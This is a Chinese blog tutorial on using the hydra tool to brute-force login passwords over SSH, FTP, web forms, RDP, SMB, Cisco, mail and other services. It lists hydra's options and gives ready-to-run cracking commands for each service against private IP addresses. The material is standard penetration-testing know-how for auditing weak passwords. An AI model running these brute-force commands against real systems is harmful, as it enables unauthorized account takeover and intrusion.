网络攻防中黑客是如何使用hydra对端口进行爆破的?

网络攻防中黑客是如何使用hydra对端口进行爆破的?

网站的防护(sql,xss...)的安全保护也已经上升了一个等级,但是由于管理员的安全意识薄弱,网站弱口令漏洞依然猖獗,不信可以看补天的漏洞提交记录,弱口令依然是漏洞中的佼佼者,当然弱口令并不仅限于网站的后台登陆弱口令,还有端口,比如 Ftp:21,ssh:22,Telnet:23,Pop3:110,3389远程登陆,8080中间件Tomcat,7001中间件Weblogic,3306 Mysql数据库(phpmyadmin),1433 SQLServer数据库,5432 Postgresql数据库...

端口扫描不用多讲,鄙人还是觉得nmap好一点,但是如何批量扫的话,丢包率可能高一点。

对于端口的爆破,首先要有一个好的字典,然后再有一个好的工具,工具的话,python脚本,超级弱口令检测工具...这里主要介绍kali里面hydra的爆破,应为hydra支持几乎所有协议的在线密码破解,并且容错率好,不过能不能爆破成功还是需要你有一个好的字典。

语法:

cobol 复制代码
# hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns][-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]

参数详解:

cobol 复制代码
-R   根据上一次进度继续破解
-S   使用SSL协议连接
-s   指定端口
-l   指定用户名
-L   指定用户名字典(文件)
-p   指定密码破解
-P   指定密码字典(文件)
-e   空密码探测和指定用户密码探测(ns)-M   <FILE>指定目标列表文件一行一条-f   在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
-C   用户名可以用:分割(username:password)可以代替-l username -p password
-o   <FILE>输出文件
-t   指定多线程数量,默认为16个线程-w   TIME 设置最大超时的时间,单位秒,默认是30s
-vV  显示详细过程
server     目标IP
service    指定服务名(telnet ftp pop3 mssql mysql ssh ssh2......)

1|0使用案例:

爆破 ssh:22 端口命令:

cobol 复制代码
hydra -L users.txt -P password.txt -t 5 -vV -o ssh.txt -e ns 192.168.0.132 ssh

爆破 Ftp:21 端口命令(指定用户名为root):

cobol 复制代码
hydra -l root -P password.txt -t 5 -vV -o ftp.txt -e ns 192.168.0.132 ftp

get方式提交,破解web登录(指定用户名为admin):

cobol 复制代码
hydra -L user.txt -p password.txt -t 线程 -vV -e ns ip http-get /admin/
hydra -l admin -p password.txt -t 线程 -vV -e ns -f ip http-get /admin/index.php

post方式提交,破解web登录:

cobol 复制代码
hydra -l admin -P password.txt -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"

参数说明:

cobol 复制代码
-t同时线程数3,

-l用户名是admin,字典pass.txt,保存为out.txt,

-f 当破解了一个密码就停止, 10.36.16.18目标ip,

http-post-form表示破解是采用http的post方式提交的表单密码破解,

<title>中的内容是表示错误猜解的返回信息提示。

破解https:

cobol 复制代码
hydra -m /index.php -l admin -P password.txt 192.168.0.132 https

破解teamspeak:

cobol 复制代码
hydra -l admin -P passworrd.txt -s 端口号 -vV 192.168.0.132 teamspeak

破解cisco:

cobol 复制代码
hydra -P password.txt 192.168.0.132 cisco
hydra -m cloud -P password.txt 192.168.0.132 cisco-enable

破解smb:

cobol 复制代码
hydra -l administrator -P password.txt 192.168.0.132 smb

破解pop3:

cobol 复制代码
hydra -l root -P password.txt my.pop3.mail pop3

破解rdp(3389端口):

cobol 复制代码
hydra -l administrator -P password.txt -V 192.168.0.132 rdp

破解http-proxy:

cobol 复制代码
hydra -l admin -P passwprd.txt http-proxy://192.168.0.132

破解imap:

cobol 复制代码
hydra -L user.txt -p secret 192.168.0.132 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
 
相关推荐
独角鲸网络安全实验室21 小时前
WhisperPair漏洞突袭:谷歌Fast Pair协议失守,数亿蓝牙设备陷静默劫持危机
网络安全·数据安全·漏洞·蓝牙耳机·智能设备·fast pair·cve-2025-36911
白帽子凯哥哥3 天前
网络安全Web基础完全指南:从小白到入门安全测试
前端·sql·web安全·信息安全·渗透测试·漏洞
独角鲸网络安全实验室5 天前
本地信任成“致命漏洞”:数千Clawdbot Agent公网裸奔,供应链与内网安全告急
网络·网关·安全·php·漏洞·clawdbot·信任机制漏洞
xixixi7777711 天前
RAG越权检索与变形指令/隐写规避常态化:攻击者通过Base64、TokenBreak、字符插入与多轮引导,诱导模型泄露知识库或训练集中的敏感信息
网络·安全·大模型·网络攻击模型·攻击·rag·越权检索
DarkAthena11 天前
【GaussDB】合入原生PG的PR来修复CVE-2025-1094漏洞后产生的严重隐患
数据库·漏洞·gaussdb
\xin13 天前
SQL 注入、文件上传绕过、MySQL UDF 提权、SUID 提权、Docker 逃逸,以及 APT 持久化技术渗透测试全流程第二次思路
sql·mysql·docker·容器·渗透测试·json·漏洞
是逍遥子没错13 天前
OA渗透测试的思维盲区:从漏洞猎人到系统拆解师
web安全·网络安全·黑客·渗透测试·系统安全·oa系统·src挖掘
IT 青年16 天前
Apache Struts XWork 组件 XXE 漏洞(CVE-2025-68493)[已复现]
漏洞·struts2
Jerry_Gao92118 天前
【成长笔记】【web安全】深入Web安全与PHP底层:四天实战课程笔记
笔记·安全·web安全·php·漏洞
小快说网安22 天前
拆解 DDoS 攻击套路:抗 D 防护的主动防御与应急响应机制
网络·ddos·网络攻击·高防ip